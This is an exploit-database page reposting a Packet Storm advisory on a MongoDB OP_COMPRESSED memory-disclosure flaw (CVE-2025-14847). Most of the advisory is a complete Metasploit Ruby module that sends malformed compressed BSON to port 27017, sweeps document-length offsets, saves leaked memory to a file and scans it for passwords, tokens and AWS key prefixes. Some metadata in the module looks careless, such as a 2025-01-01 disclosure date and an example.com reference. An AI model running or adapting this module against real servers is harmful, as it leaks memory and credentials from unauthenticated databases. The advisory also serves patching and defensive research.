Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure

🗓️ 17 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 121 Views

Memory disclosure in MongoDB due to faulty bounds validation in OP_COMPRESSED BSON decompression from crafted messages.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2025-14847
29 Dec 202503:20
githubexploit
GithubExploit		Exploit for CVE-2025-14847
26 Dec 202500:30
githubexploit
GithubExploit		Exploit for CVE-2025-14847
28 Dec 202517:34
githubexploit
GithubExploit		Exploit for CVE-2025-14857
4 Jan 202608:58
githubexploit
GithubExploit		Exploit for CVE-2025-14847
27 Dec 202515:54
githubexploit
GithubExploit		Exploit for CVE-2025-14847
30 Dec 202519:50
githubexploit
GithubExploit		Exploit for CVE-2025-14847
29 Dec 202516:56
githubexploit
GithubExploit		Exploit for Improper Handling of Length Parameter Inconsistency in Mongodb
7 Jan 202603:32
githubexploit
GithubExploit		Exploit for Improper Handling of Length Parameter Inconsistency in Mongodb
1 Jan 202618:11
githubexploit
GithubExploit		Exploit for CVE-2025-14847
31 Dec 202515:37
githubexploit
Rows per page
=============================================================================================================================================
    | # Title     : MongoDB BSON Decompression Memory Disclosure via OP_COMPRESSED                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.mongodb.com/                                                                                                    |
    =============================================================================================================================================
    
    [+] Summary    : A memory disclosure vulnerability exists in MongoDB’s handling of compressed wire protocol messages (OP_COMPRESSED). 
                     The issue arises from improper bounds validation during BSON decompression, where a crafted message can declare a manipulated uncompressed size and BSON document length.
                     By sending a malformed OP_COMPRESSED packet containing a forged BSON length field and inconsistent decompression size, a remote unauthenticated 
    				 attacker may trigger an out-of-bounds read condition. This can lead to unintended disclosure of memory contents through server error responses.
                     The vulnerability is remotely exploitable over the MongoDB service port (default: 27017) and does not require authentication under default configurations where the service is exposed.
    
    [+] Affected Versions :
    
    The vulnerability impacts the following MongoDB Server versions prior to patch releases:
    
    8.2.0 → 8.2.2
    
    8.0.0 → 8.0.16
    
    7.0.0 → 7.0.27
    
    6.0.0 → 6.0.26
    
    5.0.0 → 5.0.31
    
    4.4.0 → 4.4.29
    
    Older 4.2.x, 4.0.x, and 3.6.x branches (unpatched)
    
    Patched Versions
    
    The issue is fixed in:
    
    8.2.3
    
    8.0.17
    
    7.0.28
    
    6.0.27
    
    5.0.32
    
    4.4.30 and later
    
    [+] POC : 
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # PoC converted from Python to Metasploit Ruby module
    ##
    
    require 'msf/core'
    require 'zlib'
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::Tcp
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'CVE-2025-14847 MongoDB Memory Leak',
          'Description'    => %q{
            This module demonstrates an educational memory leak in MongoDB BSON decompression.
            It sends malformed BSON in OP_COMPRESSED messages to trigger memory disclosure.
          },
          'Author'         => [ 'Antara Mane (Python PoC)', 'Indoushka' ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2025-14847' ],
              [ 'URL', 'https://example.com/mongodb-leak' ]
            ],
          'Platform'       => ['linux','win'],
          'Arch'           => ARCH_CMD,
          'Targets'        =>
            [
              [ 'Automatic', {} ]
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2025-01-01'
        ))
    
        register_options(
          [
            Opt::RPORT(27017),
            OptInt.new('MIN_OFFSET', [ true, 'Minimum document length', 20 ]),
            OptInt.new('MAX_OFFSET', [ true, 'Maximum document length', 8192 ]),
            OptString.new('OUTPUT', [ true, 'File to save leaks', 'leaked.bin' ])
          ])
      end
    
      def send_probe(doc_len, buffer_size)
        content = "\x10a\x00\x01\x00\x00\x00"  
        bson = [doc_len].pack('<i') + content
    
        op_msg = [0].pack('<I') + "\x00" + bson
        compressed = Zlib::Deflate.deflate(op_msg)
    
        payload = [2013].pack('<I')          
        payload += [buffer_size].pack('<i')       
        payload += [2].pack('C')                  
        payload += compressed
    
        header = [
          16 + payload.length,  
          1,                   
          0,                  
          2012                  
        ].pack('<IIII')
    
        connect
        sock.put(header + payload)
        res = sock.get_once(-1, 2)
        disconnect
        res || ''
      rescue
        ''
      end
    
      def extract_leaks(response)
        return [] if response.nil? || response.length < 25
    
        leaks = []
    
        begin
          msg_len = response[0,4].unpack('<I')[0]
          if response[12,4].unpack('<I')[0] == 2012
            raw = Zlib::Inflate.inflate(response[25,msg_len-25])
          else
            raw = response[16,msg_len-16]
          end
        rescue
          return []
        end
    
        raw.scan(/field name '([^']*)'/) do |m|
          data = m[0].to_s
          next if ['?','a','$db','ping'].include?(data)
          leaks << data
        end
        raw.scan(/type (\d+)/) do |m|
          leaks << [m[0].to_i].pack('C')
        end
    
        leaks
      end
    
      def exploit
        print_status("[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak")
        print_status("[*] Target: #{rhost}:#{rport}")
        print_status("[*] Scanning offsets #{datastore['MIN_OFFSET']}-#{datastore['MAX_OFFSET']}")
    
        all_leaked = ''
        unique_leaks = {}
    
        (datastore['MIN_OFFSET']..datastore['MAX_OFFSET']).each do |doc_len|
          response = send_probe(doc_len, doc_len + 500)
          leaks = extract_leaks(response)
    
          leaks.each do |data|
            next if unique_leaks[data]
            unique_leaks[data] = true
            all_leaked << data
    
            if data.length > 10
              preview = data[0,80].force_encoding('utf-8').encode('utf-8', invalid: :replace)
              print_good("[+] offset=#{doc_len} len=#{data.length}: #{preview}")
            end
          end
        end
    
        ::File.open(datastore['OUTPUT'], 'wb') { |f| f.write(all_leaked) }
        print_status("[*] Total leaked: #{all_leaked.length} bytes")
        print_status("[*] Unique fragments: #{unique_leaks.length}")
        print_status("[*] Saved to: #{datastore['OUTPUT']}")
    
        secrets = ['password','secret','key','token','admin','AKIA']
        secrets.each do |s|
          if all_leaked.downcase.include?(s.downcase)
            print_warning("[!] Found pattern: #{s}")
          end
        end
      end
    end
    
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Feb 2026 00:00Current
8High risk
Vulners AI Score8
CVSS 3.17.5
CVSS 48.7
EPSS0.62808
SSVC
MongoDBOp compressedBson dataMemory disclosureBounds validationCrafted messagesRemote unauthenticatedDefault port 27017MongoDB versions
121